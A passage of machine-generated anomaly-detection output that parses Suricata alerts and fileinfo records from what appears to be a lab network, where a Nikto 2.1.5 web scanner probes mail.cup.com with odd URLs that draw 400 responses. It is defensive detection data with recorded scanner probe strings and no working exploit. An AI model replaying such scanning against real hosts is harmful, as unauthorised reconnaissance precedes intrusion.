combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA._", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.159362, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA._\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA._", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46774, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2036518856845440,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2036518856845440, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.159362+0000\",\"flow_id\":2036518856845440,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46774,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA._\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA._\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80", "/parser/model/time": 1583349514.162334, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46776, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.162334 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46776 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.162552, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.rdf+destype=cache+desformat=PDF", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46776, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1625615040672730,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1625615040672730, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80", "/parser/model/time": 1583349514.164694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46778, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pt-br", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.164854, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46778, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1725795152854985, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", 